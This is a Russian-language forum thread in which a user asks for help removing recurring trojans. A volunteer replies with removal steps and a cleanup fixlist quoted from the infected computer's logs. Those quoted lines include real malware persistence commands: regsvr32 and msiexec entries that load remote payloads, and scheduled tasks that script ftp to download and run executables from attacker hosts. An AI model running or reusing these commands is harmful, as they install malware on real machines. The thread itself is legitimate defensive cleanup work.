Перейти к содержанию
Правила раздела

Устал пробовать удалить трояны, что делать?

Enuard

От Enuard
в Помощь в удалении вирусов

 Share

Рекомендуемые сообщения

Enuard Новичок

Enuard

Опубликовано
Опубликовано

Добрый день. Очень неприятная ситуация. 

если в кратце - каждый день просматриваю антивирусом (др.веб куррент) на наличие вирусов - каждый день появляются одни и те же вирусы. Вчера перед сном, снова прогнал антивирус, удалил все найденные файлы, удалил задачи в планировщике задач, прогнал антивирусом снова - ничего не нашёл. запустил интернет, полазил в сети, прогнал через 40 минут - снова ничего не нашёл.

Сегодня утром, включив компьютер, проверил антивирусом - ничего не нашёл. вышел в сеть. полазил 1 час и вуаля - картина прежняя - снова всё то же самое, только в меньшем количестве. Скрин троянов прилагаю. 

Я удалял уже раз 10 данные вирусы, но каким то чудом они появляются снова и снова. 

Что нужно сделать? самое интересное то, что каким то образом в планировщик задач виндовс ложится троянская задача, которая активируется при включении компьютера. Но каким образом она туда ложиться, как? 

post-51935-0-75433300-1543393299_thumb.jpg

Ссылка на комментарий
Поделиться на другие сайты
Enuard Новичок

Enuard

Опубликовано
  • Автор
Опубликовано (изменено)

Этот файл нужно загрузить?

 

Лог сделал уже после ручной чистки системы. С планировщика задач удалял самостоятельно.

CollectionLog-2018.11.28-12.04.zip

Изменено пользователем Enuard
Ссылка на комментарий
Поделиться на другие сайты
mike 1 Мудрец

mike 1

Опубликовано
Опубликовано
Деинсталлируйте:
 

Kodobi
Muz.La
QIPApp
SafeFinder
Time tasks
Unity Web Player
YoutubeAdBlock
YoutubeDownloader
Амиго
Кнопка "Яндекс" на панели задач
 
Пофиксите следующие строчки в HiJackThis (используйте версию из папки Автологгера).
 
R0 - HKCU\Software\Microsoft\Internet Explorer\Main: [Default_Search_URL] = http://yamdex.net/?searchid=1&l10n=ru&fromsearch=1&imsid=c01fc2a04166ff35ba624364796eddf3&text={searchTerms}
R0 - HKCU\Software\Microsoft\Internet Explorer\Main: [Search Bar] = https://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBLoO-BhLymRVyoiO2t6mfQOt8TKsjoR8UVcuB-A2Yd6_d0ne-75_Oz1wxElBzmLzR2gPRvo9zsUIhjWeQlXAKI6rk1TZeq0gycD-TNf1vd5VS7d5002ctfhFWUXtkJctVCMKqphnfe4uHBI7lHqq_PFhJ2XbHpnFWN7C0Clt2dpWQK6VU0C8Oymi_GVrOheQ,,&q={searchTerms}
R0 - HKCU\Software\Microsoft\Internet Explorer\Main: [Search Page] = https://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBLoO-BhLymRVyoiO2t6mfQOt8TKsjoR8UVcuB-A2Yd6_d0ne-75_Oz1wxElBzmLzR2gPRvo9zsUIhjWeQlXAKI6rk1TZeq0gycD-TNf1vd5VS7d5002ctfhFWUXtkJctVCMKqphnfe4uHBI7lHqq_PFhJ2XbHpnFWN7C0Clt2dpWQK6VU0C8Oymi_GVrOheQ,,&q={searchTerms}
R0 - HKCU\Software\Microsoft\Internet Explorer\Main: [Start Page] = http://securedsearch.lavasoft.com/?pr=vmn&id=webcompa&ent=hp_WCYID10477_754_181124
R0 - HKCU\Software\Microsoft\Internet Explorer\Search: [Default_Search_URL] = https://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBLoO-BhLymRVyoiO2t6mfQOt8TKsjoR8UVcuB-A2Yd6_d0ne-75_Oz1wxElBzmLzR2gPRvo9zsUIhjWeQlXAKI6rk1TZeq0gycD-TNf1vd5VS7d5002ctfhFWUXtkJctVCMKqphnfe4uHBI7lHqq_PFhJ2XbHpnFWN7C0Clt2dpWQK6VU0C8Oymi_GVrOheQ,,&q={searchTerms}
R0-32 - HKLM\Software\Microsoft\Internet Explorer\Search: [CustomizeSearch] = http://yamdex.net/?searchid=1&l10n=ru&fromsearch=1&imsid=c01fc2a04166ff35ba624364796eddf3&text=
R0-32 - HKLM\Software\Microsoft\Internet Explorer\Search: [SearchAssistant] = http://yamdex.net/?searchid=1&l10n=ru&fromsearch=1&imsid=c01fc2a04166ff35ba624364796eddf3&text=
R1 - HKCU\Software\Microsoft\Internet Explorer\Main: [SearchAssistant] = https://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBLoO-BhLymRVyoiO2t6mfQOt8TKsjoR8UVcuB-A2Yd6_d0ne-75_Oz1wxElBzmLzR2gPRvo9zsUIhjWeQlXAKI6rk1TZeq0gycD-TNf1vd5VS7d5002ctfhFWUXtkJctVCMKqphnfe4uHBI7lHqq_PFhJ2XbHpnFWN7C0Clt2dpWQK6VU0C8Oymi_GVrOheQ,,&q={searchTerms}
R3 - HKCU: Default URLSearchHook is missing
R4 - SearchScopes: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3C}: [URL,SuggestionsURL,SuggestionsURLFallback] = http://yamdex.net/?searchid=1&l10n=ru&fromsearch=1&imsid=c01fc2a04166ff35ba624364796eddf3&text={searchTerms} - >>
R4 - SearchScopes: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3D}: [URL,SuggestionsURL,SuggestionsURLFallback] = http://yamdex.net/?searchid=1&l10n=ru&fromsearch=1&imsid=c01fc2a04166ff35ba624364796eddf3&text= - >>
R4 - SearchScopes: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{BDF61FAE-9D19-40F0-8F34-688DEB334CA9}: [URL,TopResultURL] = http://securedsearch.lavasoft.com/results.php?pr=vmn&id=webcompa&ent=ch_WCYID10477_754_181124&q={searchTerms} - Ad-Aware SecureSearch
R4 - SearchScopes: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{ielnksrch}: [SuggestionsURL_JSON] = http://suggestqueries.google.com/complete/search?output=firefox&client=firefox&qu={searchTerms} - Search the web
R4 - SearchScopes: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{ielnksrch}: [URL] = https://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBLoO-BhLymRVyoiO2t6mfQOt8TKsjoR8UVcuB-A2Yd6_d0ne-75_Oz1wxElBzmLzR2gPRvo9zsUIhjWeQlXAKI6rk1TZeq0gycD-TNf1vd5VS7d5002ctfhFWUXtkJctVCMKqphnfe4uHBI7lHqq_PFhJ2XbHpnFWN7C0Clt2dpWQK6VU0C8Oymi_GVrOheQ,,&q={searchTerms} - Search the web
O2 - HKLM\..\BHO: YoutubeAdBlock - {D1660F2C-BBC4-4D94-A6BA-EB25BC207DA5} - C:\Program Files (x86)\loreCZYyGIE\tX4f0SHi.dll (file missing)
O2-32 - HKLM\..\BHO: YoutubeAdBlock - {D1660F2C-BBC4-4D94-A6BA-EB25BC207DA5} - C:\Program Files (x86)\loreCZYyGIE\khWBmmjYw.dll (file missing)
O4 - MSConfig\startupreg: 3409050 [command] = C:\Users\TES_EidEnuard\AppData\Roaming\c3ctu3bioct\thu0uaobnre.exe /VERYSILENT (HKCU) (2018/11/24) (file missing)
O4 - MSConfig\startupreg: 6715148 [command] = C:\Users\TES_EidEnuard\AppData\Roaming\ofgjqr2sfa3\wmlzrhprcbu.exe /VERYSILENT (HKCU) (2018/11/24) (file missing)
O4 - MSConfig\startupreg: GoogleChromeAutoLaunch_0A5C1D289E966614EB8E1614E6915EC6 [command] = C:\Program Files (x86)\Google\Chrome\Application\chrome.exe --no-startup-window /prefetch:5 (HKCU) (2018/11/24)
O4 - MSConfig\startupreg: Kodobi [command] = C:\Users\TES_EidEnuard\AppData\Roaming\Kodobi\python\pythonw.exe "load.pyc" ml2 (HKCU) (2018/11/24) (file missing)
O4 - MSConfig\startupreg: LateCherry [command] = C:\Windows\rss\csrss.exe (HKCU) (2018/11/24)
O4 - MSConfig\startupreg: MailRuUpdater [command] = C:\Users\TES_EidEnuard\AppData\Local\Mail.Ru\MailRuUpdater.exe (HKCU) (2015/04/19) (file missing)
O4 - MSConfig\startupreg: Multitimer [command] = C:\Program Files (x86)\Multitimer\Multitimer.exe (HKLM) (2018/11/24) (file missing)
O4 - MSConfig\startupreg: P9-PJsboRr.exe [command] = C:\Program Files\Common Files\HIYOKC07A\P9-PJsboRr.exe (HKCU) (2018/11/24)
O4 - MSConfig\startupreg: QIPApp [command] = C:\Users\TES_EidEnuard\AppData\Roaming\QIPApp\QIPApp.exe (HKCU) (2018/11/24) (file missing)
O4 - MSConfig\startupreg: Timestasks [command] = C:\Program Files (x86)\Zaxar\timetasks.exe (HKLM) (2015/04/19) (file missing)
O4 - MSConfig\startupreg: YoutubeDownloader [command] = C:\Users\TES_EidEnuard\AppData\Roaming\YoutubeDownloader\python\pythonw.exe "start.pyc" ml3 (HKCU) (2018/11/24) (file missing)
O4 - MSConfig\startupreg: YoutubeDownloader_upd [command] = C:\Users\TES_EidEnuard\AppData\Roaming\YoutubeDownloader_upd\python\pythonw.exe "start.pyc" ml3 (HKCU) (2018/11/24) (file missing)
O4 - MSConfig\startupreg: ZaxarGameBrowser [command] = C:\Program Files (x86)\Zaxar\ZaxarGameBrowser.exe -s (HKLM) (2015/04/19) (file missing)
O4 - MSConfig\startupreg: ZaxarLoader [command] = C:\Program Files (x86)\Zaxar\ZaxarLoader.exe /verysilent (HKLM) (2015/04/19) (file missing)
O4 - MSConfig\startupreg: amigo [command] = C:\Users\TES_EidEnuard\AppData\Local\Amigo\Application\amigo.exe --no-startup-window (HKCU) (2015/04/19)
O4 - MSConfig\startupreg: baidusdTray [command] = C:\Program Files (x86)\Baidu\BaiduSd\3.0.0.4605\BaiduSdTray.exe -stmd=3 (HKLM) (2015/04/19) (file missing)
O4 - MSConfig\startupreg: chrome [command] = C:\Program Files (x86)\Google\Chrome\Application\chrome.exe --headless --disable-gpu --remote-debugging-port=9222 http://ner-de-mi-nis-6.info/cdn-495.html?t=0.4 (HKLM) (2018/11/24)
O4 - MSConfig\startupreg: start [command] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.ftp0930.host:280/v.sct scrobj.dll (HKLM) (2018/11/27)
O4 - MSConfig\startupreg: start1 [command] = C:\Windows\system32\msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q (HKLM) (2017/08/06)
O4 - MSConfig\startupreg: windowsmanager [command] = C:\Users\TES_EidEnuard\AppData\Local\Temp\5290\5290.exe (HKCU) (2015/04/19) (file missing)
O4 - User Startup: C:\Users\TES_EidEnuard\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AutorunsDisabled (folder)
O4-32 - HKLM\..\Run: [start] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.ftp0930.host:280/v.sct scrobj.dll
O20 - HKLM\..\Windows: [AppInit_DLLs] = C:\ProgramData\Kolnixo\Ranex.dll (file missing)
O20-32 - HKLM\..\Windows: [AppInit_DLLs] = C:\ProgramData\Kolnixo\Sunlam.dll (file missing)
 
  • Запустите его (в ОС Windows Vista/7/8/8.1/10 необходимо запускать через правую кн. мыши от имени администратора), нажмите кнопку "Сканировать" и дождитесь окончания сканирования.
  • Когда сканирование будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\Logs\AdwCleaner[s00].txt.
  • Прикрепите отчет к своему следующему сообщению.
 
Подробнее читайте в этом руководстве.
 

 

Ссылка на комментарий
Поделиться на другие сайты
mike 1 Мудрец

mike 1

Опубликовано
Опубликовано

Запустите повторно AdwCleaner (by Xplode) (в ОС Windows Vista/7/8/8.1/10 необходимо запускать через правую кн. мыши от имени администратора),  нажмите кнопку "Scan", а по окончанию сканирования нажмите кнопку "Очистить" ("Clean") и дождитесь окончания удаления.

Когда удаление будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\Logs\AdwCleaner[C00].txt.

Прикрепите отчет к своему следующему сообщению


Внимание: Для успешного удаления нужна перезагрузка компьютера!!!.

 

Подробнее читайте в этом руководстве.
Ссылка на комментарий
Поделиться на другие сайты
mike 1 Мудрец

mike 1

Опубликовано
Опубликовано
Скачайте Farbar Recovery Scan Tool  NAAC5Ba.png и сохраните на Рабочем столе.

 

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.

  1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

Убедитесь, что под окном Optional Scan отмечены "List BCD", "Driver MD5" и "90 Days Files".

Нажмите кнопку Scan.

После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении.

Если программа была запущена в первый раз, будет создан отчет (Addition.txt). Пожалуйста, прикрепите его в следующем сообщении.


3munStB.png
Ссылка на комментарий
Поделиться на другие сайты
mike 1 Мудрец

mike 1

Опубликовано
Опубликовано
ВНИМАНИЕ! Данный скрипт написан специально для этого пользователя, использование его на другом компьютере может привести к неработоспособности Windows!

 


  •  


  • Временно выгрузите антивирус, файрволл и прочее защитное ПО.


  • Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:




CreateRestorePoint:

CloseProcesses:

HKLM-x32\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.ftp0930.host:280/v.sct scrobj.dll

HKU\S-1-5-21-2671287706-1935948236-906580463-1000\...\MountPoints2: F - F:\setup.exe

HKU\S-1-5-21-2671287706-1935948236-906580463-1000\...\MountPoints2: {025d3e04-e211-11e4-97c1-806e6f6e6963} - D:\SETUP.EXE

HKU\S-1-5-21-2671287706-1935948236-906580463-1000\...\MountPoints2: {17bc0f4c-641a-11e5-b3d8-eac460abedba} - F:\AutoRun.exe {D2D77DC2-8299-11D1-8949-444553540000} 5.2066.1.A11B02 PID_0083

HKU\S-1-5-21-2671287706-1935948236-906580463-1000\...\MountPoints2: {1f7a6424-ff08-11e5-8239-e741ff5375b4} - F:\Autorun.exe

HKU\S-1-5-21-2671287706-1935948236-906580463-1000\...\MountPoints2: {4a745ccf-9d27-11e6-8f34-9819b52af906} - E:\setup.exe

GroupPolicy: Restriction - Chrome <==== ATTENTION

GroupPolicy\User: Restriction ? <==== ATTENTION

HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{55863ed5-349c-4e75-9ba2-e35dfdca26ad} <==== ATTENTION (Restriction - IP)

C:\Users\TES_EidEnuard\AppData\Local\Google\Chrome\User Data\Default\Extensions\ccfifbojenkenpkmnbnndeadpfdiffof

C:\Users\TES_EidEnuard\AppData\Local\Google\Chrome\User Data\Default\Extensions\dncemeillcpbjocckembodmbpaclamkp

C:\Users\TES_EidEnuard\AppData\Local\Google\Chrome\User Data\Default\Extensions\mfmjpfoggikolkfilofbpgcnhdcgahib

OPR Extension: (Универсальный перевод для Chrome) - C:\Users\TES_EidEnuard\AppData\Roaming\Opera Software\Opera Stable\Extensions\gdalhedleemkkdjddjgfjmcnbpejpapp [2015-04-22]

OPR Extension: (No Name) - C:\Users\TES_EidEnuard\AppData\Roaming\Opera Software\Opera Stable\Extensions\jniljaamodclkmphgkgkooplflhkadpg [2017-06-15]

S2 Windows Audio Control; C:\Program Files (x86)\Common Files\conime.exe -s [X]

S1 bd0001; C:\Windows\SysWOW64\DRIVERS\bd0001.sys [202704 2015-04-19] (Baidu)

S1 bd0002; C:\Windows\SysWOW64\DRIVERS\bd0002.sys [198600 2015-04-19] (Baidu)

S0 58203443; system32\drivers\85127761.sys [X]

S1 BAPIDRV; system32\DRIVERS\BAPIDRV64.sys [X]

S1 bd0003; system32\DRIVERS\bd0003.sys [X]

S2 BDArKit; \??\C:\Windows\System32\Drivers\BDArKit.SYS [X]

S1 BDFileDefend; system32\DRIVERS\BDFileDefend.sys [X]

S1 BDMWrench_x64; system32\DRIVERS\BDMWrench_x64.sys [X]

S1 BdSandBox; system32\DRIVERS\BdSandBox.sys [X]

2018-11-30 05:35 - 2018-11-30 19:37 - 000003520 _____ C:\Windows\System32\Tasks\Mysa

2018-11-30 05:35 - 2018-11-30 19:37 - 000003506 _____ C:\Windows\System32\Tasks\Mysa3

2018-11-30 05:35 - 2018-11-30 19:37 - 000003426 _____ C:\Windows\System32\Tasks\Mysa2

2018-11-30 05:35 - 2018-11-30 19:37 - 000003190 _____ C:\Windows\System32\Tasks\Mysa1

2018-11-30 05:35 - 2018-11-30 19:37 - 000003186 _____ C:\Windows\System32\Tasks\ok

2018-11-25 15:42 - 2018-11-30 20:30 - 000000081 _____ C:\Windows\system32\s

2018-11-25 15:42 - 2018-11-30 20:30 - 000000079 _____ C:\Windows\system32\ps

2018-11-25 15:42 - 2018-11-30 20:30 - 000000077 _____ C:\Windows\system32\p

2018-11-24 12:04 - 2018-11-24 12:04 - 000000000 ____D C:\Users\TES_EidEnuard\AppData\LocalLow\uVLgKJnzBrgAs

2018-11-24 11:54 - 2018-11-25 14:42 - 000000008 __RSH C:\Users\TES_EidEnuard\ntuser.pol

2018-11-24 11:36 - 2018-11-24 11:36 - 002024733 _____ C:\Users\TES_EidEnuard\AppData\Local\Vianix.tst

2018-11-24 11:36 - 2018-11-24 11:36 - 001995264 _____ (TODO: <Company name>) C:\Users\TES_EidEnuard\AppData\Local\Vianix.exe

2018-11-24 11:36 - 2018-11-24 11:36 - 001895384 _____ C:\Users\TES_EidEnuard\AppData\Local\Mathdex.bin

2018-11-24 11:36 - 2018-11-24 11:36 - 000722944 _____ C:\Users\TES_EidEnuard\AppData\Local\sham.db

2018-11-24 11:36 - 2018-11-24 11:36 - 000278510 _____ C:\Users\TES_EidEnuard\AppData\Local\Hatlight.bin

2018-11-24 11:36 - 2018-11-24 11:36 - 000140800 _____ C:\Users\TES_EidEnuard\AppData\Local\installer.dat

2018-11-24 11:36 - 2018-11-24 11:36 - 000126464 _____ C:\Users\TES_EidEnuard\AppData\Local\noah.dat

2018-11-24 11:36 - 2018-11-24 11:36 - 000070896 _____ C:\Users\TES_EidEnuard\AppData\Local\Config.xml

2018-11-24 11:36 - 2018-11-24 11:36 - 000005568 _____ C:\Users\TES_EidEnuard\AppData\Local\md.xml

2018-11-24 11:36 - 2018-11-24 11:36 - 000000003 _____ C:\Users\TES_EidEnuard\AppData\Local\wbem.ini

2018-11-30 19:37 - 2018-03-21 15:29 - 000000171 _____ C:\Program Files\Common Files\xp.dat

2018-11-30 19:36 - 2018-06-27 04:59 - 000000084 _____ C:\Program Files\Common Files\xpdown.dat

2018-11-24 10:29 - 2018-08-18 20:22 - 000000086 _____ C:\Program Files\Common Files\nsaok.dat

2013-02-07 15:22 - 2013-02-07 15:22 - 000050330 _____ () C:\Program Files (x86)\AntiDust.exe

2016-04-05 21:12 - 2002-09-12 10:05 - 000000453 _____ () C:\Program Files (x86)\ggwdc.ini

2018-08-18 20:22 - 2018-11-24 10:29 - 000000086 _____ () C:\Program Files\Common Files\nsaok.dat

2018-03-21 15:29 - 2018-11-30 19:37 - 000000171 _____ () C:\Program Files\Common Files\xp.dat

2018-06-27 04:59 - 2018-11-30 19:36 - 000000084 _____ () C:\Program Files\Common Files\xpdown.dat

2018-11-24 11:36 - 2018-11-24 11:36 - 007813632 _____ () C:\Users\TES_EidEnuard\AppData\Local\agent.dat

2018-11-24 11:36 - 2018-11-24 11:36 - 000070896 _____ () C:\Users\TES_EidEnuard\AppData\Local\Config.xml

2018-11-24 13:26 - 2018-11-24 13:26 - 006161408 _____ () C:\Users\TES_EidEnuard\AppData\Local\dump007.dat

2018-11-24 11:36 - 2018-11-24 11:36 - 000278510 _____ () C:\Users\TES_EidEnuard\AppData\Local\Hatlight.bin

2018-11-24 11:36 - 2018-11-24 11:36 - 000140800 _____ () C:\Users\TES_EidEnuard\AppData\Local\installer.dat

30598-05-30 11:27 - 30598-05-30 11:27 - 000186368 ____N (Microsoft Corporation) C:\Users\TES_EidEnuard\AppData\Local\iYmPYkeVYOOIF.exe

2018-11-24 11:36 - 2018-11-24 11:36 - 001895384 _____ () C:\Users\TES_EidEnuard\AppData\Local\Mathdex.bin

2018-11-24 11:36 - 2018-11-24 11:36 - 000005568 _____ () C:\Users\TES_EidEnuard\AppData\Local\md.xml

2018-11-24 11:36 - 2018-11-24 11:36 - 000126464 _____ () C:\Users\TES_EidEnuard\AppData\Local\noah.dat

2018-11-25 12:17 - 2018-11-25 14:29 - 000007627 _____ () C:\Users\TES_EidEnuard\AppData\Local\Resmon.ResmonCfg

2018-11-24 11:36 - 2018-11-24 11:36 - 000722944 _____ () C:\Users\TES_EidEnuard\AppData\Local\sham.db

2018-11-24 11:36 - 2018-11-24 11:36 - 000032038 _____ () C:\Users\TES_EidEnuard\AppData\Local\uninstall_temp.ico

2018-11-24 11:36 - 2018-11-24 11:36 - 001995264 _____ (TODO: <Company name>) C:\Users\TES_EidEnuard\AppData\Local\Vianix.exe

2018-11-24 11:36 - 2018-11-24 11:36 - 002024733 _____ () C:\Users\TES_EidEnuard\AppData\Local\Vianix.tst

2018-11-24 11:36 - 2018-11-24 11:36 - 000000003 _____ () C:\Users\TES_EidEnuard\AppData\Local\wbem.ini

Task: {009817C0-455B-48E2-991B-9C03ED82246E} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa

Task: {0694AA53-66CA-431F-8DB7-B737DEABBD8B} - \NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} -> No File <==== ATTENTION

Task: {0DDFF42A-51A9-4C81-9B33-0F76ED5C98E9} - \NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} -> No File <==== ATTENTION

Task: {392AAA25-BB34-4EAC-B4AE-2E62D6798DC1} - \NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} -> No File <==== ATTENTION

Task: {3B5FF40A-E972-4103-B5C5-5C29A4C8FA40} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION

Task: {3FF2EA7B-FF0B-45E5-AAA4-319FC18D2B00} - \YoutubeDownloader -> No File <==== ATTENTION

Task: {4492BAB8-F6C8-4635-8A41-7CBAC2949559} - \ClwhhsndxrpfQ2 -> No File <==== ATTENTION

Task: {4FED48E9-0429-4D83-98D4-719CE7FBED0F} - \Kodobi -> No File <==== ATTENTION

Task: {5551218B-E4C7-4DB8-942A-979832795BA1} - \GameNet -> No File <==== ATTENTION

Task: {59DD6E35-407B-43D6-B3A8-647D54C3FF88} - \YoutubeDownloader_upd -> No File <==== ATTENTION

Task: {6421A2F1-39A3-417D-AA71-0F074547D866} - System32\Tasks\Mysa => cmd /c echo open ftp.ftp0930.host>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe <==== ATTENTION

Task: {6C13B6A3-1D39-439A-8A40-D388FEB4BFCE} - \NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} -> No File <==== ATTENTION

Task: {6CFA1A02-53EB-492D-8672-C56D48CE9CA3} - \NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} -> No File <==== ATTENTION

Task: {715D7ECA-37EA-4B5B-87A8-6B9120279DE8} - \GoogleUpdateTaskMachineCore -> No File <==== ATTENTION

Task: {74F95EC3-F666-4118-A88C-68E54DC42147} - System32\Tasks\Mysa3 => cmd /c echo open ftp.ftp0930.host>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION

Task: {7B3C6D90-365D-43ED-BD1F-72DFB651B6AA} - \GoogleUpdateTaskMachineUA -> No File <==== ATTENTION

Task: {9632AFFB-50F3-4486-9A3C-0932C1FEE407} - System32\Tasks\Mysa2 => cmd /c echo open ftp.ftp0930.host>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION

Task: {B9A75CEC-6F7D-44AC-B4DF-ED379B7B602F} - \NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} -> No File <==== ATTENTION

Task: {F3A09529-D564-486C-9E44-F4881DF28604} - \NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} -> No File <==== ATTENTION

Task: {F3C334C7-A1D4-4580-9CD9-DFB20A690CCB} - \Kodobi2 -> No File <==== ATTENTION

WMI:subscription\__TimerInstruction->fuckyoumm2_itimer: <==== ATTENTION

WMI:subscription\__IntervalTimerInstruction->fuckyoumm2_itimer: <==== ATTENTION

C:\Windows\rss

FirewallRules: [{C406C767-D75E-4FAB-A623-44AF4D24CA79}] => (Allow) C:\Windows\rss\csrss.exe

FirewallRules: [{EFB2418D-FBD3-40FD-892B-0DED0A225588}] => (Allow) C:\Windows\rss\csrss.exe

EmptyTemp:



  • Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!


  • Обратите внимание, что компьютер будет перезагружен.


  • Внимание! Если на рабочем столе будет создан архив Дата_время.zip, то загрузите этот архив через данную форму

 

 

Ссылка на комментарий
Поделиться на другие сайты
Enuard Новичок

Enuard

Опубликовано
  • Автор
Опубликовано

прикрепляю. 

Вчера устанавливал было майл агент и хотел проверить одно приложение от майла. Установился gamecentr майловский, после обнаружил снова появившийся конхост. 
Сегодня проверил через Др.Веб куррент, он так же обнаружил данный конхост. вместе с ним обнаружил задачи в планировщике задач виндовса: Mysa, Mysa1, Mysa2, Mysa3, ok. 

В очередной раз удалил данные задачи. До установки майл агента и геймцентра майловского не проверял на наличие данных троянов. 
 

FRST.txt

Addition.txt

Ссылка на комментарий
Поделиться на другие сайты
Enuard Новичок

Enuard

Опубликовано
  • Автор
Опубликовано

Ну так что можно сделать? вирусы снова появилисьт, как понимаю, они скачиваются через какое то приложение\программу. При подключении к сети, происходит скачивание файлов и автоматический запуск через систему

Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
 Share
Перейти к списку тем

  • Похожий контент

    • orpham
      троян .kwx8
      От orpham
      Добрый день.
      15.02 вечером, зашифровало все файлы. Комп настроен для удаленного подключения по RDP, включен круглосуточно. Все файлы с расширением .kwx8/
      Помогите пож-та.
      Лог сканирования KVRT во вложении.
      report_2025.02.17_15.55.29.klr.rar
    • rafikoff
      Что делать ? Зашифрованы/удалены все разделы двух дисков
      От rafikoff
      Здравствуйте , All
      Ко мне обратились знакомые моего друга.
      У них произошла большая неприятность с Windows. Был установлен лицензионный KIS.
      В последний день работы у них начал подтормаживать компьютер, и при последнем заходе - не принимал пароль от логина.
      Выключили - получили след ситуацию. Windows перестала загружаться.
      Загрузчик просит пароль. Вводишь любой пароль - пишет Missing operating system
      Загрузился с Win PE Strelec - Акронис и диспетчер задач пишет, что все разделы не отформатированы.
      GetDataBack написал файловая система не найдена.
      R-Studio тоже самое, но он видит файлы в куче без структуры.
      Что может быть причиной данной проблемы? 
      Что делать? для восстановления документов , часть находится на рабочем столе, часть на hdd.



    • GLORYX
      скачал какой то вирус вроде троян
      От GLORYX
      не знаю как но где словил троян в диспечере задай просто находится пустой проц с аватаркой шестеренки пробовал через все програму успехом не увенчалось.
    • Hendehog
      Помощь в определении функциональности трояна
      От Hendehog
      Здравствуйте.
      Вирус замаскированный под файл от госорганов.
      Просканировал KVRT, DR.Web, и сняты логи автологгером.
      Прошу подсказки - что именно делается вирус, куда внедряется, как ворует деньги с банковских счетов?
      Ну и понять, чист сейчас ПК или нет.
      CollectionLog-2025.02.07-10.57.zip KVRT2020_Data.zip
    • Danila05
      Помогите удалить майнер
      От Danila05
      Запускаю Avbr и каждый раз после проверки, вылетает красная строка где написан путь к файлу и пишет что трубуется перегрузка. Сколько раз не перезагружался пк, проблема остается. 

×
×
  • Создать...